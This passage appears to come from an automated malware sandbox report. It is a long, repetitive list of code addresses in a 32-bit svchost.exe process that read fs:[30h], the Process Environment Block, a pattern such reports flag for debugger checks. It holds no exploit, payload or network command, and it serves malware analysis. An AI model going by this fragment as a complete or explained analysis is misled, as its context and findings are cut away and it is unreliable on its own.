            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
